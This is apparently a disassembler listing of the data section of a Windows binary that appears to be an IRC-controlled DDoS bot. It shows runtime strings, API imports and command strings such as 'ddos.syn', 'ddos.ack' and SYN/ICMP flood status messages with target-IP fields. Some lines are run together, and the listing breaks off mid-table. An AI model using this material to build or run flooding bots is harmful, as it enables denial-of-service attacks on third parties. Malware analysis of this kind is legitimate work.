dd 0FD62F97Ah, 8A65C9ECh, 14015C4Fh, 63066CD9h, 0FA0F3D63h
dd 8D080DF5h, 3B6E20C8h, 4C69105Eh, 0D56041E4h, 0A2677172h
dd 3C03E4D1h, 4B04D447h, 0D20D85FDh, 0A50AB56Bh, 35B5A8FAh
dd 42B2986Ch, 0DBBBC9D6h, 0ACBCF940h, 32D86CE3h, 45DF5C75h
dd 0DCD60DCFh, 0ABD13D59h, 26D930ACh, 51DE003Ah, 0C8D75180h
dd 0BFD06116h, 21B4F4B5h, 56B3C423h, 0CFBA9599h, 0B8BDA50Fh
dd 2802B89Eh, 5F058808h, 0C60CD9B2h, 0B10BE924h, 2F6F7C87h
dd 58684C11h, 0C1611DABh, 0B6662D3Dh, 76DC4190h, 1DB7106h
dd 98D220BCh, 0EFD5102Ah, 71B18589h, 6B6B51Fh, 9FBFE4A5h
dd 0E8B8D433h, 7807C9A2h, 0F00F934h, 9609A88Eh, 0E10E9818h
dd 7F6A0DBBh, 86D3D2Dh, 91646C97h, 0E6635C01h, 6B6B51F4h
dd 1C6C6162h, 856530D8h, 0F262004Eh, 6C0695EDh, 1B01A57Bh
dd 8208F4C1h, 0F50FC457h, 65B0D9C6h, 12B7E950h, 8BBEB8EAh
dd 0FCB9887Ch, 62DD1DDFh, 15DA2D49h, 8CD37CF3h, 0FBD44C65h
dd 4DB26158h, 3AB551CEh, 0A3BC0074h, 0D4BB30E2h, 4ADFA541h
dd 3DD895D7h, 0A4D1C46Dh, 0D3D6F4FBh, 4369E96Ah, 346ED9FCh
dd 0AD678846h, 0DA60B8D0h, 44042D73h, 33031DE5h, 0AA0A4C5Fh
dd 0DD0D7CC9h, 5005713Ch, 270241AAh, 0BE0B1010h, 0C90C2086h
dd 5768B525h, 206F85B3h, 0B966D409h, 0CE61E49Fh, 5EDEF90Eh
dd 29D9C998h, 0B0D09822h, 0C7D7A8B4h, 59B33D17h, 2EB40D81h
dd 0B7BD5C3Bh, 0C0BA6CADh, 0EDB88320h, 9ABFB3B6h, 3B6E20Ch
dd 74B1D29Ah, 0EAD54739h, 9DD277AFh, 4DB2615h, 73DC1683h
dd 0E3630B12h, 94643B84h, 0D6D6A3Eh, 7A6A5AA8h, 0E40ECF0Bh
dd 9309FF9Dh, 0A00AE27h, 7D079EB1h, 0F00F9344h, 8708A3D2h
dd 1E01F268h, 6906C2FEh, 0F762575Dh, 806567CBh, 196C3671h
dd 6E6B06E7h, 0FED41B76h, 89D32BE0h, 10DA7A5Ah, 67DD4ACCh
dd 0F9B9DF6Fh, 8EBEEFF9h, 17B7BE43h, 60B08ED5h, 0D6D6A3E8h
dd 0A1D1937Eh, 38D8C2C4h, 4FDFF252h, 0D1BB67F1h, 0A6BC5767h
dd 3FB506DDh, 48B2364Bh, 0D80D2BDAh, 0AF0A1B4Ch, 36034AF6h
dd 41047A60h, 0DF60EFC3h, 0A867DF55h, 316E8EEFh, 4669BE79h
dd 0CB61B38Ch, 0BC66831Ah, 256FD2A0h, 5268E236h, 0CC0C7795h
dd 0BB0B4703h, 220216B9h, 5505262Fh, 0C5BA3BBEh, 0B2BD0B28h
dd 2BB45A92h, 5CB36A04h, 0C2D7FFA7h, 0B5D0CF31h, 2CD99E8Bh
dd 5BDEAE1Dh, 9B64C2B0h, 0EC63F226h, 756AA39Ch, 26D930Ah
dd 9C0906A9h, 0EB0E363Fh, 72076785h, 5005713h, 95BF4A82h
dd 0E2B87A14h, 7BB12BAEh, 0CB61B38h, 92D28E9Bh, 0E5D5BE0Dh
dd 7CDCEFB7h, 0BDBDF21h, 86D3D2D4h, 0F1D4E242h, 68DDB3F8h
dd 1FDA836Eh, 81BE16CDh, 0F6B9265Bh, 6FB077E1h, 18B74777h
dd 88085AE6h, 0FF0F6A70h, 66063BCAh, 11010B5Ch, 8F659EFFh
dd 0F862AE69h, 616BFFD3h, 166CCF45h, 0A00AE278h, 0D70DD2EEh
dd 4E048354h, 3903B3C2h, 0A7672661h, 0D06016F7h, 4969474Dh
dd 3E6E77DBh, 0AED16A4Ah, 0D9D65ADCh, 40DF0B66h, 37D83BF0h
dd 0A9BCAE53h, 0DEBB9EC5h, 47B2CF7Fh, 30B5FFE9h, 0BDBDF21Ch
dd 0CABAC28Ah, 53B39330h, 24B4A3A6h, 0BAD03605h, 0CDD70693h
dd 54DE5729h, 23D967BFh, 0B3667A2Eh, 0C4614AB8h, 5D681B02h
dd 2A6F2B94h, 0B40BBE37h, 0C30C8EA1h, 5A05DF1Bh, 2D02EF8Dh
dbl_421660 dq 9.765625e-4 ; DATA XREF: sub_40BBF7+2B8�r
; sub_40BBF7+2CD�r ...
dbl_421668 dq -3.0517578125e-5 ; DATA XREF: sub_413F12+1E�r
dbl_421670 dq 1.0 ; DATA XREF: sub_415D04+6C�r
; sub_415E4B+6C�r ...
dword_421678 dd 0FFFFFFFFh, 417BEFh, 417C03hbyte_421684 db 6 ; DATA XREF: sub_417D6C:loc_417DC3�r
db 2 dup(0), 6
dd 100h, 6030010h, 10020600h, 45454504h, 5050505h, 303505h
dd 50h, 38282000h, 8075850h, 30303700h, 75057h, 8202000h
dd 0
dd 60686008h, 606060h, 78707000h, 8787878h, 807h, 8080007h
dd 8000008h, 7000800h, 8
aNull: ; DATA XREF: .text:off_4383EC�o
unicode 0, <(null)>,0
align 10h
aNull_0 db '(null)',0 ; DATA XREF: .text:off_4383E8�o
align 4
a__global_heap_ db '__GLOBAL_HEAP_SELECTED',0 ; DATA XREF: sub_418AD0+8E�o
align 10h
a__msvcrt_heap_ db '__MSVCRT_HEAP_SELECT',0 ; DATA XREF: sub_418AD0+4F�o
align 4
a_yn db '_yn',0
a_y1 db '_y1',0
a_y0 db '_y0',0
aFrexp db 'frexp',0
align 4
aFmod db 'fmod',0
align 4
a_hypot db '_hypot',0
align 4
a_cabs db '_cabs',0
align 4
aLdexp db 'ldexp',0
align 4
aModf db 'modf',0
align 4
aFabs db 'fabs',0
align 4
aFloor db 'floor',0
align 4
aCeil db 'ceil',0
align 4
aTan db 'tan',0
aCos db 'cos',0
aSin db 'sin',0
aSqrt db 'sqrt',0
align 10h
aAtan2 db 'atan2',0
align 4
aAtan db 'atan',0
align 10h
aAcos db 'acos',0
align 4
aAsin db 'asin',0
align 10h
aTanh db 'tanh',0
align 4
aCosh db 'cosh',0
align 10h
aSinh db 'sinh',0
align 4
aLog10 db 'log10',0
align 10h
aLog db 'log',0
aPow db 'pow',0
aExp db 'exp',0 ; DATA XREF: .text:off_43A63C�o
align 10h
dbl_4217E0 dq 0.0 ; DATA XREF: sub_41A227+8C�r
; sub_41A227+AC�r ...
dbl_4217E8 dq 4.195835e6 ; DATA XREF: sub_41A73C+F�r
dbl_4217F0 dq 3.145727e6 ; DATA XREF: sub_41A73C+6�r
aIsprocessorfea db 'IsProcessorFeaturePresent',0 ; DATA XREF: sub_41A77A+F�o
align 4
aKernel32 db 'KERNEL32',0 ; DATA XREF: sub_41A77A�o
align 10h
aE000 db 'e+000',0 ; DATA XREF: sub_41A8A1+93�o
align 4
dword_421828 dd 0FFFFFFFFh, 41AF8Ch, 41AF96h, 0dword_421838 dd 0FFFFFFFFh, 0 dd offset loc_41B112
align 8
dd offset sub_41B0F0
dd offset sub_41B0FA
dword_421850 dd 0FFFFFFFFh, 41B342h, 41B346h, 0dword_421860 dd 0FFFFFFFFh, 41B3A4h, 41B3ADh, 0dword_421870 dd 0FFFFFFFFh, 0 dd offset loc_41B47D
align 10h
dd offset loc_41B469
dd offset loc_41B46D
dword_421888 dd 0FFFFFFFFh, 0 dd offset loc_41B4D3
align 8
dd offset loc_41B4BF
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
db 0B4h, 41h, 0
dword_4218A0 dd 2 dup(0) ; sub_41DA93+39�o ...
dword_4218A8 dd 0FFFFFFFFh, 41C749h, 41C74Dh, 0FFFFFFFFh, 41C7FDh, 41C801h
; DATA XREF: sub_41C639+5�o
dd 746E7572h, 20656D69h, 6F727265h, 2072h, 534F4C54h, 72652053h
dd 0D726F72h, 0Ah, 474E4953h, 72726520h, 0A0D726Fh, 0
dd 414D4F44h, 65204E49h, 726F7272h, 0A0Dh, 32303652h, 2D0A0D38h
dd 616E7520h, 20656C62h, 69206F74h, 6974696Eh, 7A696C61h
dd 65682065h, 0A0D7061h, 0
aR6027NotEnough db 'R6027',0Dh,0Ah
db '- not enough space for lowio initialization',0Dh,0Ah,0
align 10h
aR6026NotEnough db 'R6026',0Dh,0Ah
db '- not enough space for stdio initialization',0Dh,0Ah,0
align 4
aR6025PureVirtu db 'R6025',0Dh,0Ah
db '- pure virtual function call',0Dh,0Ah,0
align 10h
aR6024NotEnough db 'R6024',0Dh,0Ah
db '- not enough space for _onexit/atexit table',0Dh,0Ah,0
align 4
aR6019UnableToO db 'R6019',0Dh,0Ah
db '- unable to open console device',0Dh,0Ah,0
align 4
aR6018Unexpecte db 'R6018',0Dh,0Ah
db '- unexpected heap error',0Dh,0Ah,0
align 4
aR6017Unexpecte db 'R6017',0Dh,0Ah
db '- unexpected multithread lock error',0Dh,0Ah,0
align 4
aR6016NotEnough db 'R6016',0Dh,0Ah
db '- not enough space for thread data',0Dh,0Ah,0
aAbnormalProgra db 0Dh,0Ah
db 'abnormal program termination',0Dh,0Ah,0
align 4
aR6009NotEnough db 'R6009',0Dh,0Ah
db '- not enough space for environment',0Dh,0Ah,0
aR6008NotEnough db 'R6008',0Dh,0Ah
db '- not enough space for arguments',0Dh,0Ah,0
align 10h
aR6002FloatingP db 'R6002',0Dh,0Ah ; DATA XREF: .text:off_43AA7C�o
db '- floating point not loaded',0Dh,0Ah,0
align 4
aMicrosoftVisua db 'Microsoft Visual C++ Runtime Library',0 ; DATA XREF: sub_41D7B5+119�o
align 10h
asc_421B70 db 0Ah ; DATA XREF: sub_41D7B5+F1�o
db 0Ah,0
align 4
aRuntimeErrorPr db 'Runtime Error!',0Ah ; DATA XREF: sub_41D7B5+D3�o
db 0Ah
db 'Program: ',0
align 10h
a___ db '...',0 ; DATA XREF: sub_41D7B5+BF�o
aProgramNameUnk db '<program name unknown>',0 ; DATA XREF: sub_41D7B5+7D�o
align 10h
dword_421BB0 dd 0FFFFFFFFh, 41DB8Ch, 41DB90haSunmontuewedth db 'SunMonTueWedThuFriSat',0
align 4
aJanfebmaraprma db 'JanFebMarAprMayJunJulAugSepOctNovDec',0
align 4
aTz db 'TZ',0 ; DATA XREF: sub_41EA02+A�o
align 10h
aGetlastactivep db 'GetLastActivePopup',0 ; DATA XREF: sub_41EF8E+3D�o
align 4
aGetactivewindo db 'GetActiveWindow',0 ; DATA XREF: sub_41EF8E+35�o
aMessageboxa db 'MessageBoxA',0 ; DATA XREF: sub_41EF8E+24�o
a1Qnan db '1#QNAN',0 ; DATA XREF: sub_41F8D8:loc_41F9CD�o
align 4
a1Inf db '1#INF',0 ; DATA XREF: sub_41F8D8+D8�o
align 10h
a1Ind db '1#IND',0 ; DATA XREF: sub_41F8D8+C7�o
align 4
a1Snan db '1#SNAN',0 ; DATA XREF: sub_41F8D8+AD�o
align 10h
dword_421C50 dd 0FFFFFFFFh, 4202D0h, 4202D4h, 0FFFFFFFFh, 42033Fh, 420343h
; DATA XREF: sub_420119+5�o
dd 421D78h
off_421C6C dd offset loc_4208A8 ; DATA XREF: sub_4206B0+4D�o
; sub_4208C4+C�o
dd offset sub_42076E
dd offset sub_42088B
aStringTooLong db 'string too long',0 ; DATA XREF: sub_4206B0+1E�o
dd offset dword_421DB0
off_421C8C dd offset loc_4207D5 ; DATA XREF: sub_42070A+4E�o
; sub_420798+11�o ...
dd offset sub_42076E
dd offset sub_42077B
dword_421C98 dd 0FFFFFFFFh ; sub_4207F1+34�r
dd offset dword_421E00
off_421CA0 dd offset loc_420990 ; DATA XREF: sub_4208DC+4D�o
; sub_4209AC+C�o
dd offset sub_42076E
dd offset sub_420973
aInvalidStringP db 'invalid string position',0 ; DATA XREF: sub_4208DC+1E�o
dd offset dword_421E30
off_421CC8 dd offset sub_420A12 ; DATA XREF: sub_420A2E+8�o
; sub_420A6B+8�o ...
; ---------------------------------------------------------------------------
retf
; ---------------------------------------------------------------------------
db 0Ah, 42h, 0
aUnknownExcepti db 'Unknown exception',0 ; DATA XREF: .text:00420AD2�o
align 4
dd offset dword_421E78
off_421CE8 dd offset loc_420AED ; DATA XREF: sub_420AD8�o
; .text:off_43B1A0�o ...
align 10h
dword_421CF0 dd 0E06D7363h, 1, 2 dup(0) dd 3, 19930520h, 2 dup(0)
off_421D10 dd offset off_43B1A0 ; DATA XREF: .text:00421D60�o
; .text:00421D94�o ...
dd 2 dup(0)
dd 0FFFFFFFFh, 2 dup(0)
off_421D28 dd offset off_43B1B8 ; DATA XREF: .text:00421D5C�o
; .text:00421D90�o ...
dd 1, 0
dd 0FFFFFFFFh, 2 dup(0)
off_421D40 dd offset off_43B1D8 ; DATA XREF: .text:00421D58�o
dd 2, 0
dd 0FFFFFFFFh, 2 dup(0)
dd offset off_421D40
dd offset off_421D28
dd offset off_421D10
dd 0
db 0 ; DATA XREF: .text:00421D88�o
db 0
db 0
db 0
db 0
db 0
db 0
db 0
dd 3, 421D58h, 3 dup(0)
dd offset off_43B1D8
dd offset unk_421D68
align 10h
dd offset off_421D28
dd offset off_421D10
dword_421D98 dd 4 dup(0) dd 2, 421D90h
dword_421DB0 dd 3 dup(0) dd offset off_43B1B8
dd offset dword_421D98+8
align 8
off_421DC8 dd offset off_43B1F8 ; DATA XREF: .text:00421DE0�o
dd 2, 0
dd 0FFFFFFFFh, 2 dup(0)
dd offset off_421DC8
dd offset off_421D28
dd offset off_421D10
dword_421DEC dd 3 dup(0) dd 3, 421DE0h
dword_421E00 dd 3 dup(0) dd offset off_43B1F8
dd offset dword_421DEC+4
dd offset off_421D10
dword_421E18 dd 4 dup(0) dd 1, 421E14h
dword_421E30 dd 3 dup(0) dd offset off_43B1A0
dd offset dword_421E18+8
align 8
off_421E48 dd offset off_43B218 ; DATA XREF: .text:00421E60�o
dd 2 dup(0)
dd 0FFFFFFFFh, 2 dup(0)
dd offset off_421E48
dd 0
db 0 ; DATA XREF: .text:00421E88�o
db 0
db 0
db 0
db 0
db 0
db 0
db 0
dd 1, 421E60h
dword_421E78 dd 3 dup(0) dd offset off_43B218
dd offset unk_421E68
align 10h
dd 0FFFFFFFFh, 420B4Ch, 0
dd offset sub_420B44
dword_421EA0 dd 19930520h, 2, 421E90h, 4 dup(0) dd 0FFFFFFFFh, 420B70h, 0
dd offset loc_420B78
dword_421ECC dd 19930520h, 2, 421EBCh, 4 dup(0) dd 0FFFFFFFFh, 0
dd 0FFFFFFFFh, 4 dup(0)
dd offset loc_404DF7
align 10h
dd 2 dup(1), 421EF8h
dword_421F1C dd 19930520h, 2, 421EE8h, 1, 421F08h, 3 dup(0)
; DATA XREF: .text:loc_420B8C�o
dd offset off_43B1A0
dd 0
dd 0FFFFFFFFh, 0
dd 0Ch, 420A6Bh, 2 dup(0)
dd offset off_43B1B8
dd 0
dd 0FFFFFFFFh, 0
dd 1Ch, 4207F1h, 2 dup(0)
dd offset off_43B1D8
dd 0
dd 0FFFFFFFFh, 0
dd 1Ch, 4208C4h, 0
dword_421F98 dd 3, 421F78h, 421F58h, 421F38hdword_421FA8 dd 0 ; sub_42088B+12�o
dd offset sub_42084E
dd 0
dd offset dword_421F98
dword_421FB8 dd 19930520h, 1, 421FD8h, 5 dup(0) dd 0FFFFFFFFh, 420B98h
dword_421FE0 dd 19930520h, 1, 422000h, 5 dup(0)dword_422000 dd 0FFFFFFFFh, 420BACh, 2, 421F58h, 421F38h, 0dword_422018 dd 0 dd offset sub_420798
dd 0
dd offset dword_422000+8
dword_422028 dd 19930520h, 1, 422048h, 5 dup(0) dd 0FFFFFFFFh, 420BC0h
dword_422050 dd 19930520h, 1, 422070h, 5 dup(0) dd 0FFFFFFFFh, 420BD4h
dword_422078 dd 19930520h, 1, 422098h, 5 dup(0) dd 0FFFFFFFFh, 420BE8h, 0
dd offset off_43B1F8
dd 0
dd 0FFFFFFFFh, 0
dd 1Ch, 4209ACh, 0
dword_4220C0 dd 3, 4220A0h, 421F58h, 421F38hdword_4220D0 dd 0 ; sub_420973+12�o
dd offset sub_420936
dd 0
dd offset dword_4220C0
dword_4220E0 dd 19930520h, 1, 422100h, 5 dup(0) dd 0FFFFFFFFh, 420BFCh
dword_422108 dd 19930520h, 1, 422128h, 5 dup(0) dd 0FFFFFFFFh, 420C10h, 2231Ch, 2 dup(0)
dd 22368h, 211B0h, 2216Ch, 2 dup(0)
dd 22B0Eh, 21000h, 5 dup(0)
dd 7C85F90Fh, 7C833478h, 7C80A35Eh, 7C80D077h, 7C832044h
dd 7C80BCCFh, 7C809E01h, 7C84467Dh, 7C812641h, 7C81DC03h
dd 7C80A490h, 7C838A0Ch, 7C810E51h, 7C812F39h, 7C80CC97h
dd 7C812F08h, 7C81CF5Bh, 7C814AE7h, 7C80C058h, 7C80929Ch
dd 7C80A427h, 7C82FA46h, 7C814EEAh, 7C80A7D4h, 7C802442h
dd 7C809BF8h, 7C80180Eh, 7C809B47h, 7C810D87h, 7C8312E5h
dd 7C801A24h, 7C80B4CFh, 7C83632Dh, 7C8361EEh, 7C910331h
dd 7C810637h, 7C810A77h, 7C81153Ch, 7C80EDD7h, 7C80E7ECh
dd 7C80E866h, 7C834EB1h, 7C8137D9h, 7C810B8Eh, 7C9010EDh
dd 7C901005h, 7C80B829h, 7C91188Ah, 7C801D77h, 7C80ADA0h
dd 7C80B6A1h, 7C82F7A0h, 7C80FE82h, 7C80FF19h, 7C80B974h
dd 7C80B905h, 7C80945Ch, 7C831CB8h, 7C831C45h, 7C802367h
dd 7C8329D9h, 7C812782h, 7C835DCAh, 7C81AE17h, 7C80DDFEh
dd 7C80DDF5h, 7C81E0C7h, 7C812ADEh, 7C8310F2h, 7C81CDDAh
dd 7C831EABh, 7C8309E1h, 7C809920h, 7C8286EEh, 7C802520h
dd 7C80E93Fh, 7C81CE03h, 7C835E8Fh, 7C80A0D4h, 7C8216A4h
dd 7C801E16h, 7C80D262h, 7C830B14h, 7C9105D4h, 7C91043Dh
dd 7C937A40h, 7C8350BFh, 7C80176Bh, 7C9179FDh, 7C801EEEh
dd 7C812F1Dh, 7C8111DAh, 7C814AF2h, 7C810EF8h, 7C812BB6h
dd 7C809AE4h, 7C809A51h, 7C809E79h, 7C812A09h, 7C9109EDh
dd 7C838DE8h, 7C80CCA8h, 7C812E76h, 7C809915h, 7C8127A7h
dd 7C862E2Ah, 7C81DF77h, 0
dd 71AB4428h, 71AB664Dh, 71AB3EA1h, 71AB4519h, 71AB3E00h
dd 71AB88D3h, 71AC1028h, 71AB4FD4h, 71AC0BDEh, 71AB2DC0h
dd 71AB4544h, 71AB2BF4h, 71AB2B66h, 71AB3B91h, 71AB406Ah
dd 71AB615Ah, 71AB428Ah, 71AB9639h, 0
dd 5F325357h, 642E3233h, 6C6Ch, 784500B0h, 68547469h, 64616572h
dd 1D50000h, 54746547h, 436B6369h, 746E756Fh, 2990000h
aQueryperform_1 db 'QueryPerformanceCounter',0
db 9Ah ; š
db 2, 51h, 75h
aEryperformance db 'eryPerformanceFrequency',0
db 0B9h ; ¹
db 1, 47h, 65h
aTsystemdirecto db 'tSystemDirectoryA',0
dw 16Bh
aGetlocaltime db 'GetLocalTime',0
align 2
dw 349h
aSleep db 'Sleep',0
dw 26Bh
aMultibytetowid db 'MultiByteToWideChar',0
dd 655202ABh, 69466461h, 656Ch, 6C43002Eh, 4865736Fh, 6C646E61h
dd 3970065h, 74697257h, 6C694665h, 35B0065h
aTransactnamedp db 'TransactNamedPipe',0
aM db 'M',0
aCreatefilea db 'CreateFileA',0
db 75h ; u
db 1, 47h, 65h
aTmodulefilenam db 'tModuleFileNameA',0
align 2
dw 1D6h
aGettimeformata db 'GetTimeFormatA',0
align 4
db 3Fh ; ?
db 1, 47h, 65h
aTdateformata db 'tDateFormatA',0
align 2
dw 169h
aGetlasterror db 'GetLastError',0
align 2
aI_0 db 'i',0
aCreatethread db 'CreateThread',0
align 2
dw 15Bh
aGetfilesize db 'GetFileSize',0
db 56h ; V
db 1, 47h, 65h
aTfileattribute db 'tFileAttributesA',0
align 2
db 'Å',0
aFindclose db 'FindClose',0
db '¼',0
aFiletimetosyst db 'FileTimeToSystemTime',0
align 2
db '»',0
aFiletimetoloca db 'FileTimeToLocalFileTime',0
db 'Ó',0
aFindnextfilea db 'FindNextFileA',0
db 'É',0
aFindfirstfilea db 'FindFirstFileA',0
align 2
dw 310h
aSetfilepointer db 'SetFilePointer',0
align 4
db 47h ; G
db 2, 4Ch, 65h
aAvecriticalsec db 'aveCriticalSection',0
align 4
aP db '',0
aEntercriticals db 'EnterCriticalSection',0
align 4
db 1Ah
db 2, 49h, 6Eh
aItializecritic db 'itializeCriticalSectionAndSpinCount',0
aZ db 'z',0
aDeletecritical db 'DeleteCriticalSection',0
db 48h ; H
db 2, 4Ch, 6Fh
aAdlibrarya db 'adLibraryA',0
align 4
db 98h ; ˜
db 1, 47h, 65h
aTprocaddress db 'tProcAddress',0
align 2
dw 177h
aGetmodulehandl db 'GetModuleHandleA',0
align 2
db 'ê',0
aFormatmessagea db 'FormatMessageA',0
align 4
db 0
db 2, 47h, 6Ch
aObalunlock db 'obalUnlock',0
align 4
db 0F9h ; ù
db 1, 47h, 6Ch
aOballock db 'obalLock',0
align 2
dw 365h
aUnmapviewoffil db 'UnmapViewOfFile',0
db 5Eh ; ^
db 2, 4Dh, 61h
aPviewoffile db 'pViewOfFile',0
aN db 'N',0
aCreatefilemapp db 'CreateFileMappingA',0
align 2
dw 314h
aSetfiletime db 'SetFileTime',0
db 5Dh ; ]
db 1, 47h, 65h
aTfiletime db 'tFileTime',0
db '`',0
aCreateprocessa db 'CreateProcessA',0
align 10h
db '²',0
aExpandenvironm db 'ExpandEnvironmentStringsA',0
db 0Eh
db 3, 53h, 65h
aTfileattribu_0 db 'tFileAttributesA',0
align 2
retf
; ---------------------------------------------------------------------------
db 1
aGettemppatha db 'GetTempPathA',0
align 2
dw 152h
aGetexitcodepro db 'GetExitCodeProcess',0
align 4
dd 65500287h, 614E6B65h, 5064656Dh, 657069h, 7544008Ch
dd 63696C70h, 48657461h, 6C646E61h, 13A0065h
aGetcurrentproc db 'GetCurrentProcess',0
a__0 db '_',0
aCreatepipe db 'CreatePipe',0
align 4
db 0DFh ; ß
db 1, 47h, 65h
aTversionexa db 'tVersionExA',0
db 0FAh ; ú
db 1, 47h, 6Ch
aObalmemorystat db 'obalMemoryStatus',0
align 2
aP_0 db '¯',0
aExitprocess db 'ExitProcess',0
db '|',0
aDeletefilea db 'DeleteFileA',0
dw 27Ch
aOpenprocess db 'OpenProcess',0
db 3Bh ; ;
db 1, 47h, 65h
aTcurrentproces db 'tCurrentProcessId',0
db '=',0
aCopyfilea db 'CopyFileA',0
dw 385h
aWaitforsingleo db 'WaitForSingleObject',0
aZ_0 db 'Z',0
aCreatemutexa db 'CreateMutexA',0
align 4
dd 65540352h, 6E696D72h, 54657461h, 61657268h, 2640064h
dd 65766F4Dh, 656C6946h, 3890041h
aWidechartomult db 'WideCharToMultiByte',0
dd 6547010Ch, 6D6F4374h, 65747570h, 6D614E72h, 4165h, 65540351h
dd 6E696D72h, 50657461h, 65636F72h, 7373h, 6547016Ch, 636F4C74h
dd 49656C61h, 416F666Eh, 1700000h, 4C746547h, 6369676Fh
dd 72446C61h, 73657669h, 2060000h, 70616548h, 6F6C6C41h
dd 20C0063h, 70616548h, 65657246h, 2CC0000h, 556C7452h
dd 6E69776Eh, 1D80064h
aGettimezoneinf db 'GetTimeZoneInformation',0
align 4
db 0BEh ; ¾
db 1, 47h, 65h
aTsystemtime db 'tSystemTime',0
db 10h
db 2, 48h, 65h
aAprealloc db 'apReAlloc',0
dw 1AFh
aGetstartupinfo db 'GetStartupInfoA',0
db 8
db 1, 47h, 65h
aTcommandlinea db 'tCommandLineA',0
dw 1DEh
aGetversion db 'GetVersion',0
align 4
db 50h ; P
db 1, 47h, 65h
aTenvironmentva db 'tEnvironmentVariableA',0
dw 20Ah
aHeapdestroy db 'HeapDestroy',0
db 8
db 2, 48h, 65h
aApcreate db 'apCreate',0
align 2
dw 378h
aVirtualfree db 'VirtualFree',0
db 75h ; u
db 3, 56h, 69h
aRtualalloc db 'rtualAlloc',0
align 4
db 2Ch ; ,
db 2, 49h, 73h
aBadwriteptr db 'BadWritePtr',0
db 9Dh ;
db 2, 52h, 61h
aIseexception db 'iseException',0
align 2
dw 212h
aHeapsize db 'HeapSize',0
align 2
dw 23Ah
aLcmapstringa db 'LCMapStringA',0
align 2
dw 23Bh
aLcmapstringw db 'LCMapStringW',0
align 2
dw 0FCh
aGetcpinfo db 'GetCPInfo',0
dw 0F5h
aGetacp db 'GetACP',0
align 4
db 8Bh ; ‹
db 1, 47h, 65h
aToemcp db 'tOEMCP',0
align 4
db 62h ; b
db 3, 55h, 6Eh
aHandledexcepti db 'handledExceptionFilter',0
align 4
aA_0 db 'í',0
aFreeenvironmen db 'FreeEnvironmentStringsA',0
aU db 'î',0
aFreeenvironm_0 db 'FreeEnvironmentStringsW',0
db 4Dh ; M
db 1, 47h, 65h
aTenvironmentst db 'tEnvironmentStrings',0
db 4Fh ; O
db 1, 47h, 65h
aTenvironment_0 db 'tEnvironmentStringsW',0
align 2
dw 319h
aSethandlecount db 'SetHandleCount',0
align 4
dd 654701B1h, 64745374h, 646E6148h, 656Ch, 6547015Eh, 6C694674h
dd 70795465h, 1B20065h, 53746547h, 6E697274h, 70795467h
dd 4165h, 654701B5h, 72745374h, 54676E69h, 57657079h, 32C0000h
dd 53746553h, 61486474h, 656C646Eh, 0E50000h, 73756C46h
dd 6C694668h, 66754265h, 73726566h, 33D0000h
aSetunhandledex db 'SetUnhandledExceptionFilter',0
db 29h ; )
db 2, 49h, 73h
aBadreadptr db 'BadReadPtr',0
align 10h
db 26h ; &
db 2, 49h, 73h
aBadcodeptr db 'BadCodePtr',0
align 10h
db 5
db 3, 53h, 65h
aTendoffile db 'tEndOfFile',0
align 10h
a4 db '4',0
aComparestringa db 'CompareStringA',0
align 2
a5 db '5',0
aComparestringw db 'CompareStringW',0
align 4
db 8
db 3, 53h, 65h
aTenvironment_1 db 'tEnvironmentVariableA',0
aKernel32_dll db 'KERNEL32.dll',0
align 4
dd 139h dup(0)
dword_423000 dd 0 dd offset sub_4036B6
dd offset sub_404EA5
dd offset sub_4209C4
dword_423010 dd 0 dword_423014 dd 0 dd offset sub_4166E2
dd offset sub_41CC21
dd offset sub_41D972
dd offset sub_41E7E4
dword_423028 dd 0 dword_42302C dd 0 dd offset sub_41DA17
dword_423034 dd 0 dword_423038 dd 0 dd offset sub_41E7F5
dword_423040 dd 4 dup(0) unk_423050 db 2 ; DATA XREF: start+5B�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 64h ; d
db 64h, 6Fh, 73h
db 2Eh ; .
db 6Dh, 1Fh, 64h
db 1Fh
db 6Ch, 20h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aDoneWithFloodI db ' Done with flood (%iKB/sec).',0
align 4
unk_42308C db 2 ; DATA XREF: sub_4010B2+31A�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 64h ; d
db 64h, 6Fh, 73h
db 2Eh ; .
db 6Dh, 1Fh, 64h
db 1Fh
db 6Ch, 20h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aSendErrorD_ db ' Send error: <%d>.',0
align 10h
aDdos_random db 'ddos.random',0 ; DATA XREF: sub_4010B2:loc_4011DE�o
aDdos_ack db 'ddos.ack',0 ; DATA XREF: sub_4010B2:loc_4011C2�o
align 4
aDdos_syn db 'ddos.syn',0 ; DATA XREF: sub_4010B2+F1�o
align 8
unk_4230E8 db 2 ; DATA XREF: sub_401444+390�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 20h
db 69h, 63h, 6Dh
db 70h ; p
db 2Eh, 6Dh, 1Fh
db 64h ; d
db 1Fh, 6Ch, 20h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aErrorSendingPa db 'Error sending packets to IP: %s. Packets sent: %d. Returned: <%d>'
db '.',0
align 10h
unk_423150 db 2 ; DATA XREF: sub_401444+326�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 20h
db 69h, 63h, 6Dh
db 70h ; p
db 2Eh, 6Dh, 1Fh
db 64h ; d
db 1Fh, 6Ch, 20h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aDoneWithSFlood db 'Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/sec (%dMB'
db ').',0
unk_4231B4 db 2 ; DATA XREF: sub_401444+12A�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 20h
db 69h, 63h, 6Dh
db 70h ; p
db 2Eh, 6Dh, 1Fh
db 64h ; d
db 1Fh, 6Ch, 20h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aInvalidTargetI db 'Invalid target IP.',0
align 4
unk_4231E8 db 2 ; DATA XREF: sub_401444+C2�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 20h
db 69h, 63h, 6Dh
db 70h ; p
db 2Eh, 6Dh, 1Fh
db 64h ; d
db 1Fh, 6Ch, 20h
